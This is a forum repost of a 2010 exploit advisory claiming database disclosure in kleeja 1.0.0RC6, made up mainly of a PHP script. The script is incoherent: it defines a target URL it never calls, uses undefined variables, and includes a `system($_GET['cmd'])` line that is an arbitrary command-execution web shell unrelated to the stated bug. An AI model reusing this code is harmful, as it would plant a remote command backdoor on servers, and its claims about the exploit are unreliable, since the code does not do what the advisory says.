-
-
[转帖]kleeja 1.0.0RC6 Database Disclosure
-
发表于:
2010-8-10 08:03
2054
-
[转帖]kleeja 1.0.0RC6 Database Disclosure
====================================================
kleeja1.0.0RC6 Database Disclosure Exploit
====================================================
########################################################################
# Vendor: kleeja.com
# Date: 2010-05-27
# Author : indoushka
# Contact : 00213771818860
# Home : www.sec4ever.com
# Bug : Database Disclosure Exploit
# Tested on : windows SP2 Fran?ais V.(Pnx2 2.0)
########################################################################
# Exploit By indoushka
<?php
$action = "http://127.0.0.1/kleeja/admin.php?cp=bckup";
$sql_data = "# 1.0.0RC6, DB version:6\n";
$sql_data .= "# Kleeja Backup kleeja.com kleeja version : " . KLEEJA_VERSION . ", DB version:" . $config['db_version'] . "\n";
$sql_data .= "# DATE : " . gmdate("d-m-Y H:i:s", time()) . " GMT\n";
$sql_data .= "#\n\n\n";
$cmd = $_GET['cmd'];
system($cmd);
$db_name_save = $dbname . '_kleeja.sql';
@set_time_limit(0);
header("Content-length: " . strlen($outta));
header("Content-type: text/plain");
header("Content-Disposition: attachment; filename=$db_name_save");
echo $sql_data . $outta;
exit;
?>
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
